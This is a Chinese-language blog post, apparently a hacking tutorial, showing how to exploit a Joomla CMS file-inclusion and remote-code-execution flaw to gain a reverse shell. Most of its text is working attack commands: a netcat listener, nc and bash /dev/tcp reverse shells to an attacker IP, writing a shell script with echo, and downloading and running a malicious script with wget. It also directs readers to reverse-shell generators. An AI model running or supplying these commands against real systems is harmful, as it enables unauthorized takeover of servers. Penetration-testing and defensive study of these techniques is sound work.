【视频讲解】黑客常用的远程命令执行实战及演示

图片[1]-【视频讲解】黑客常用的远程命令执行实战及演示-FancyPig's blog

相关阅读

我们之前讲过反弹shell(亦称反向shell,英文reverse shell)的原理

基于上面的原理,我们也分享了多期实战的视频

以及前几天分享的0day均是通过该原理

视频讲解

我们今天给大家分享joomla CMS系统文件包含、远程代码执行的漏洞,当我们发现一个可以执行命令的URL路径时,我们可以尝试通过直接执行反弹shell、也可以通过echo将其输出到文件,再执行文件,如果上述方法都不行的时候?我们还可以尝试通过wget或者curl命令来从网站上下载恶意脚本到本地,完成恶意脚本的执行,然后让服务器主动连接我们的监听端口,最终控制整台服务器!

图文讲解

监听端口等待反弹Shell连接

nc -nlvp 4444

通用思路

当发现文件包含可以完成命令执行的时候,我们可以考虑通过下面三种方式来执行反弹shell的脚本

  • 直接运行脚本
  • echo生成脚本文件
  • wget/Curl下载脚本文件

直接运行脚本

nc -e /bin/sh 192.168.0.192 4444
图片[2]-【视频讲解】黑客常用的远程命令执行实战及演示-FancyPig's blog
bash -i >&  /dev/tcp/192.168.0.192/4444 0>&1
图片[3]-【视频讲解】黑客常用的远程命令执行实战及演示-FancyPig's blog

echo生成脚本文件

图片[4]-【视频讲解】黑客常用的远程命令执行实战及演示-FancyPig's blog

生成shell.sh

echo 'bash -i >& /dev/tcp/192.168.0.192/4444 0>&1' > shell.sh

然后给执行的权限

chmod 777 shell.sh

最后运行脚本

bash shell.sh

wget/Curl下载脚本文件

这里我们事先在Kali linux上传好我们的恶意脚本,在目标系统中使用wget命令从Kali linux下载shell.sh这个文件

wget 192.168.0.192/shell.sh
图片[5]-【视频讲解】黑客常用的远程命令执行实战及演示-FancyPig's blog

为了确保文件正常下载,我们还可以使用下面命令查看脚本文件

cat shell.sh
图片[6]-【视频讲解】黑客常用的远程命令执行实战及演示-FancyPig's blog

然后给文件运行权限

chmod 777 shell.sh
图片[7]-【视频讲解】黑客常用的远程命令执行实战及演示-FancyPig's blog

最终运行恶意脚本

bash shell.sh
图片[8]-【视频讲解】黑客常用的远程命令执行实战及演示-FancyPig's blog

然后我们从Kali linux上就可以接管这台机器的终端了

图片[9]-【视频讲解】黑客常用的远程命令执行实战及演示-FancyPig's blog

常见的反弹shell在线生成

很多网友可能会疑惑了,反弹shell的命令有没有快捷生成的工具?这里当然是有了

图片[10]-【视频讲解】黑客常用的远程命令执行实战及演示-FancyPig's blog

当然除了在线生成,我们还可以通过浏览器插件,之前也讲过

黑客必备的Chrome浏览器插件——Hacktool

图片[11]-【视频讲解】黑客常用的远程命令执行实战及演示-FancyPig's blog
© 版权声明
THE END
喜欢就支持一下吧
点赞63赞赏 分享
评论 共5条

请登录后发表评论